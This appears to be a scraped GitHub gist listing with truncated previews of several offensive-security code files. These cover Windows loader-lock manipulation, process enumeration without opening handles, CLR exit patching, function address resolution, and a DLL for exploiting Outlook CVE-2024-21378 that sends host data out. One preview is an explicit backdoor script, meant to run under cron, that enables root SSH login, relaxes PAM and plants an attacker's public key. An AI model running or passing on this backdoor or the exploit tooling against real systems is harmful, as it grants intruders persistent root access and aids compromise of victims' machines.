This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Copyright: (c) 2024, Jordan Borean (@jborean93) <jborean93@gmail.com> | |
# MIT License (see LICENSE or https://opensource.org/licenses/MIT) | |
Function New-ScheduledTaskSession { | |
<# | |
.SYNOPSIS | |
Creates a PSSession for a process running as a scheduled task. | |
.DESCRIPTION | |
Creates a PSSession that can be used to run code inside a scheduled task |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Copyright (C) 2023 Evan McBroom | |
// Originally authored October 19th, 2023. | |
// | |
// Geoff Chappell first documented the format of the loader lock cookie on November 26th, 2008. | |
// His work is applied here to unlock the loader lock without knowing the original cookie that | |
// LdrLockLoaderLock returned. This same example code may be safely used in DllMain to unlock | |
// the loader lock and execute code that would otherwise deadlock the loader. | |
// Sources: | |
// - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/ldrapi/lockloaderlock.htm | |
// - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/ldrapi/unlockloaderlock.htm |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Copyright (C) 2024 Evan McBroom | |
#include <Windows.h> | |
#include <iostream> | |
#include <vector> | |
#include <WbemCli.h> | |
#include <atlbase.h> | |
#include <iomanip> | |
// The modified, compiled IDL file from: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles | |
// Author: TheWover | |
// | |
#include <iostream> | |
#include <string> | |
#include "ntdefs.h" | |
bool demoSystemProcessInformation(bool full) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Place our backdoor script into /tmp/ssh.sh | |
# This will be ran by cron | |
# Run one line at a time. Do not try to paste entire command in at once.... | |
cat << EOF > /tmp/ssh.sh | |
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p /root/.ssh && touch /root/.ssh/authorized_keys ; echo "ENTER YOUR PUBLIC KEY HERE" >> /root/.ssh/authorized_keys ; /usr/sbin/service ssh restart | |
# Then type EOF and press enter | |
# Ensure the script has execute permissions | |
chmod +x /tmp/ssh.sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// White Knight Labs - Offensive Development | |
// Inline Assembly - Get Function Address | |
#include <iostream> | |
#include <windows.h> | |
// Function definition | |
void* GetFunctionAddress(const char* functionName) { | |
void* getFunctionAddr = nullptr; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
apt install golang -y | |
GOROOT="/usr/local/go" | |
PATH="${PATH}:${GOROOT}/bin" | |
GOPATH=$HOME/go | |
PATH="${PATH}:${GOROOT}/bin:${GOPATH}/bin" | |
go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// Resolve dynamic address of Process.Environment.Exit in CLR host process using C++ | |
// | |
// Based on : | |
// https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/ | |
// https://github.com/yamakadi/clroxide/blob/214222d578bf62b4c7fc860125268f4eecb9f331/examples/patch_exit.rs | |
// https://github.com/kyleavery/inject-assembly/blob/8db977c0fd1da039df920f9dd4840d4a3ec2aa2c/src/scmain.c | |
// https://github.com/TheWover/donut/blob/master/loader/test/rdt.cpp ;) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <Psapi.h> | |
#include <metahost.h> | |
#include <comutil.h> | |
#include <mscoree.h> | |
#include "patch_info.h" | |
#include "base\helpers.h" | |
/** | |
* For the debug build we want: |
NewerOlder